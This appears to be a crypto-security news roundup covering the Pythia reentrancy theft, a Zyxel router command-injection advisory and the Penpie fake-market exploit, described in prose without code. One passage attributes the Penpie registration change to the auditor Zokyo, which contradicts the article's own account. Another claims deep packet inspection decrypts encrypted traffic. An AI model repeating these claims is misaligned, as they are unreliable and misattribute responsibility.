 |
Pythia, Re-entry Attack
Pythia Finance, a decentralized finance protocol, had $53,000 stolen via a reentrancy attack on September 3, according to a report from blockchain security firm Quill Audits. Pythia is an algorithmic stablecoin project that aims to manage finances using artificial intelligence.
An attacker was able to collect more rewards than he was entitled to by repeatedly calling the “Claim Reward” function, preventing the reward balance from being updated after each call.
According to the report, the attacker was able to repeatedly call the token’s “secure transfer” function in rapid succession because Pythia calls this function when rewards are distributed. This could cause the malicious token contract to call Pythia again, which would then call Pythia again, creating a chain reaction that would drain the protocol’s funds.
Quill Audits’ partial audit report on Pythia shows no outstanding security issues whatsoever, suggesting the team may have upgraded their contracts to prevent further use of this exploit.
Reentrancy attacks are one of the most common types of smart contract exploits, where an attacker repeatedly calls a function without fully executing the code.
Critical vulnerability in Zyxel
On September 4, networking hardware manufacturer Zyxel disclosed that some of its networking equipment had a critical vulnerability that could allow attackers to execute code on users’ routers and access points, potentially giving hackers access to users’ devices.
According to the disclosure, the vulnerability is a result of “improper sanitization of a special element in the parameter ‘host’ of a CGI program” in several different firmware versions. This improper sanitization allows these firmware versions to “allow an unauthenticated attacker to execute OS commands by sending a crafted cookie to a vulnerable device.”
Cryptocurrency wallet users should be especially wary of potential attacks on their home networks. If an attacker gains access to a user’s home network, they can use this access to redirect the user’s traffic via DNS spoofing, view unencrypted data transmitted over the network, or use deep packet inspection to decrypt encrypted data. The data obtained can be used in social engineering attacks to convince the user to approve transactions or share their private keys.
Zyxel has provided a list of potentially affected devices, including the NWA50AX PRO, NWA90AX, WAC500 and other access points, as well as the USG LITE 60AX router. The manufacturer has advised users of these devices to upgrade their firmware.
Penpie exploiters created a fake Pendle Market.
According to a September 4 report from blockchain security firm Zokyo, the $27 million Penpie exploit was possible due to a flaw that allowed any user to create a Pendle marketplace. The report claims that Zokyo audited previous versions of the protocol but did not contain the flaw at the time.
According to the report, Penpie includes a function called “registerPenpiePool” that can be used to register new pool addresses and Pendle Markets. To prevent malicious markets from being registered, a modifier is included to check if the Pendle Market is already registered to the factory contract of Pendle Finance. If it is not registered to this factory contract, it cannot be registered. However, any user can register their own market to the factory contract by calling the createNewMarket function on the factory contract. According to the report, this basically means that any user can create and register a Pendle Market.
Attackers exploited this vulnerability to create fake Pendle Markets and pools, which were configured to offer valuable Pendle tokens as rewards.
The protocol also contained a reentrancy flaw that allowed the attacker to repeatedly deposit tokens into all markets before other balances were updated. The attacker would repeatedly call the deposit function, artificially inflating the rewards they would receive. They would then withdraw their deposits and claim their rewards, draining the protocol of over $27 million.
According to the report, the reentrancy flaw was present in the version that Zokyo audited, but that version only allowed the protocol team to register new pools and markets, preventing external attackers from exploiting them. The report states:
“The _market parameter received in the batchHarvestMarketRewards(…) method was expected to be non-malicious, as in previous versions of the code audited by Zokyo, only the owner (multi-signature) could register a pool.”
In a separate report published on September 3, the Penpie team claimed that Zokyo introduced “permissionless pool registration” about a year after the audit. At that time, they hired security firm AstraSec to audit the new registration system. However, the scope of this audit only included new contracts. Since the exploit originated from an interaction between two different contracts audited by two different teams, neither team caught the vulnerability. Penpie claimed that they will be conducting “periodic audits of the entire protocol” in the future to prevent such incidents from happening again.
Penpie is a decentralized finance protocol that aims to provide yield enhancement to Pendle Finance users. The exploit for this occurred on September 3rd.
Christopher Locke
Some say he is a white hat hacker living in the black mining hills of Dakota, pretending to be a children’s crossing guard to avoid the NSA’s eyes. What we do know is that Christopher Locke has a pathological desire to hunt scammers and hackers.